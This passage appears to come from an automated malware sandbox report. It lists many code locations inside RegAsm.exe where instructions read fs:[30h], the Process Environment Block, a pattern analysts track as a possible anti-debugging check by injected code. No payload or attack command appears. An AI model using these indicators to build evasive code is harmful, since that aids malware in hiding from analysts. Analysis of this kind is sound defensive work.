            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB2349 mov eax, dword ptr fs:[00000030h]7_2_02FB2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030062D6 mov eax, dword ptr fs:[00000030h]7_2_030062D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C310 mov ecx, dword ptr fs:[00000030h]7_2_02F2C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50310 mov ecx, dword ptr fs:[00000030h]7_2_02F50310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A30B mov eax, dword ptr fs:[00000030h]7_2_02F6A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A30B mov eax, dword ptr fs:[00000030h]7_2_02F6A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A30B mov eax, dword ptr fs:[00000030h]7_2_02F6A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]7_2_02F2C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F720F0 mov ecx, dword ptr fs:[00000030h]7_2_02F720F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]7_2_02F2A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F380E9 mov eax, dword ptr fs:[00000030h]7_2_02F380E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB60E0 mov eax, dword ptr fs:[00000030h]7_2_02FB60E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB20DE mov eax, dword ptr fs:[00000030h]7_2_02FB20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF60B8 mov eax, dword ptr fs:[00000030h]7_2_02FF60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]7_2_02FF60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F280A0 mov eax, dword ptr fs:[00000030h]7_2_02F280A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC80A8 mov eax, dword ptr fs:[00000030h]7_2_02FC80A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004164 mov eax, dword ptr fs:[00000030h]7_2_03004164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004164 mov eax, dword ptr fs:[00000030h]7_2_03004164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3208A mov eax, dword ptr fs:[00000030h]7_2_02F3208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5C073 mov eax, dword ptr fs:[00000030h]7_2_02F5C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32050 mov eax, dword ptr fs:[00000030h]7_2_02F32050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6050 mov eax, dword ptr fs:[00000030h]7_2_02FB6050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6030 mov eax, dword ptr fs:[00000030h]7_2_02FC6030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A020 mov eax, dword ptr fs:[00000030h]7_2_02F2A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C020 mov eax, dword ptr fs:[00000030h]7_2_02F2C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E016 mov eax, dword ptr fs:[00000030h]7_2_02F4E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E016 mov eax, dword ptr fs:[00000030h]7_2_02F4E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E016 mov eax, dword ptr fs:[00000030h]7_2_02F4E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E016 mov eax, dword ptr fs:[00000030h]7_2_02F4E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030061E5 mov eax, dword ptr fs:[00000030h]7_2_030061E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB4000 mov ecx, dword ptr fs:[00000030h]7_2_02FB4000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD2000 mov eax, dword ptr fs:[00000030h]7_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F601F8 mov eax, dword ptr fs:[00000030h]7_2_02F601F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]7_2_02FAE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]7_2_02FAE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]7_2_02FAE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]7_2_02FAE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]7_2_02FAE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF61C3 mov eax, dword ptr fs:[00000030h]7_2_02FF61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF61C3 mov eax, dword ptr fs:[00000030h]7_2_02FF61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB019F mov eax, dword ptr fs:[00000030h]7_2_02FB019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB019F mov eax, dword ptr fs:[00000030h]7_2_02FB019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB019F mov eax, dword ptr fs:[00000030h]7_2_02FB019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB019F mov eax, dword ptr fs:[00000030h]7_2_02FB019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A197 mov eax, dword ptr fs:[00000030h]7_2_02F2A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A197 mov eax, dword ptr fs:[00000030h]7_2_02F2A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2A197 mov eax, dword ptr fs:[00000030h]7_2_02F2A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F70185 mov eax, dword ptr fs:[00000030h]7_2_02F70185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEC188 mov eax, dword ptr fs:[00000030h]7_2_02FEC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEC188 mov eax, dword ptr fs:[00000030h]7_2_02FEC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD4180 mov eax, dword ptr fs:[00000030h]7_2_02FD4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD4180 mov eax, dword ptr fs:[00000030h]7_2_02FD4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C156 mov eax, dword ptr fs:[00000030h]7_2_02F2C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC8158 mov eax, dword ptr fs:[00000030h]7_2_02FC8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36154 mov eax, dword ptr fs:[00000030h]7_2_02F36154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36154 mov eax, dword ptr fs:[00000030h]7_2_02F36154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC4144 mov eax, dword ptr fs:[00000030h]7_2_02FC4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC4144 mov eax, dword ptr fs:[00000030h]7_2_02FC4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC4144 mov ecx, dword ptr fs:[00000030h]7_2_02FC4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC4144 mov eax, dword ptr fs:[00000030h]7_2_02FC4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC4144 mov eax, dword ptr fs:[00000030h]7_2_02FC4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F60124 mov eax, dword ptr fs:[00000030h]7_2_02F60124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDA118 mov ecx, dword ptr fs:[00000030h]7_2_02FDA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDA118 mov eax, dword ptr fs:[00000030h]7_2_02FDA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDA118 mov eax, dword ptr fs:[00000030h]7_2_02FDA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDA118 mov eax, dword ptr fs:[00000030h]7_2_02FDA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF0115 mov eax, dword ptr fs:[00000030h]7_2_02FF0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov ecx, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov ecx, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov ecx, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov eax, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDE10E mov ecx, dword ptr fs:[00000030h]7_2_02FDE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]7_2_02FAE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]7_2_02FAE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]7_2_02FAE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]7_2_02FAE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB06F1 mov eax, dword ptr fs:[00000030h]7_2_02FB06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB06F1 mov eax, dword ptr fs:[00000030h]7_2_02FB06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]7_2_02F6A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]7_2_02F6A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F666B0 mov eax, dword ptr fs:[00000030h]7_2_02F666B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]7_2_02F6C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34690 mov eax, dword ptr fs:[00000030h]7_2_02F34690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F34690 mov eax, dword ptr fs:[00000030h]7_2_02F34690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F62674 mov eax, dword ptr fs:[00000030h]7_2_02F62674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF866E mov eax, dword ptr fs:[00000030h]7_2_02FF866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF866E mov eax, dword ptr fs:[00000030h]7_2_02FF866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A660 mov eax, dword ptr fs:[00000030h]7_2_02F6A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A660 mov eax, dword ptr fs:[00000030h]7_2_02F6A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4C640 mov eax, dword ptr fs:[00000030h]7_2_02F4C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E627 mov eax, dword ptr fs:[00000030h]7_2_02F4E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F66620 mov eax, dword ptr fs:[00000030h]7_2_02F66620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68620 mov eax, dword ptr fs:[00000030h]7_2_02F68620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3262C mov eax, dword ptr fs:[00000030h]7_2_02F3262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72619 mov eax, dword ptr fs:[00000030h]7_2_02F72619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAE609 mov eax, dword ptr fs:[00000030h]7_2_02FAE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4260B mov eax, dword ptr fs:[00000030h]7_2_02F4260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F347FB mov eax, dword ptr fs:[00000030h]7_2_02F347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F347FB mov eax, dword ptr fs:[00000030h]7_2_02F347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F527ED mov eax, dword ptr fs:[00000030h]7_2_02F527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]7_2_02FBE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]7_2_02F3C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB07C3 mov eax, dword ptr fs:[00000030h]7_2_02FB07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F307AF mov eax, dword ptr fs:[00000030h]7_2_02F307AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE47A0 mov eax, dword ptr fs:[00000030h]7_2_02FE47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD678E mov eax, dword ptr fs:[00000030h]7_2_02FD678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38770 mov eax, dword ptr fs:[00000030h]7_2_02F38770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40770 mov eax, dword ptr fs:[00000030h]7_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30750 mov eax, dword ptr fs:[00000030h]7_2_02F30750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBE75D mov eax, dword ptr fs:[00000030h]7_2_02FBE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72750 mov eax, dword ptr fs:[00000030h]7_2_02F72750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72750 mov eax, dword ptr fs:[00000030h]7_2_02F72750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB4755 mov eax, dword ptr fs:[00000030h]7_2_02FB4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov esi, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov eax, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6674D mov eax, dword ptr fs:[00000030h]7_2_02F6674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov eax, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov ecx, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6273C mov eax, dword ptr fs:[00000030h]7_2_02F6273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FAC730 mov eax, dword ptr fs:[00000030h]7_2_02FAC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C720 mov eax, dword ptr fs:[00000030h]7_2_02F6C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C720 mov eax, dword ptr fs:[00000030h]7_2_02F6C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30710 mov eax, dword ptr fs:[00000030h]7_2_02F30710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F60710 mov eax, dword ptr fs:[00000030h]7_2_02F60710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C700 mov eax, dword ptr fs:[00000030h]7_2_02F6C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004500 mov eax, dword ptr fs:[00000030h]7_2_03004500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F304E5 mov ecx, dword ptr fs:[00000030h]7_2_02F304E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F644B0 mov ecx, dword ptr fs:[00000030h]7_2_02F644B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]7_2_02FBA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F364AB mov eax, dword ptr fs:[00000030h]7_2_02F364AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEA49A mov eax, dword ptr fs:[00000030h]7_2_02FEA49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5A470 mov eax, dword ptr fs:[00000030h]7_2_02F5A470
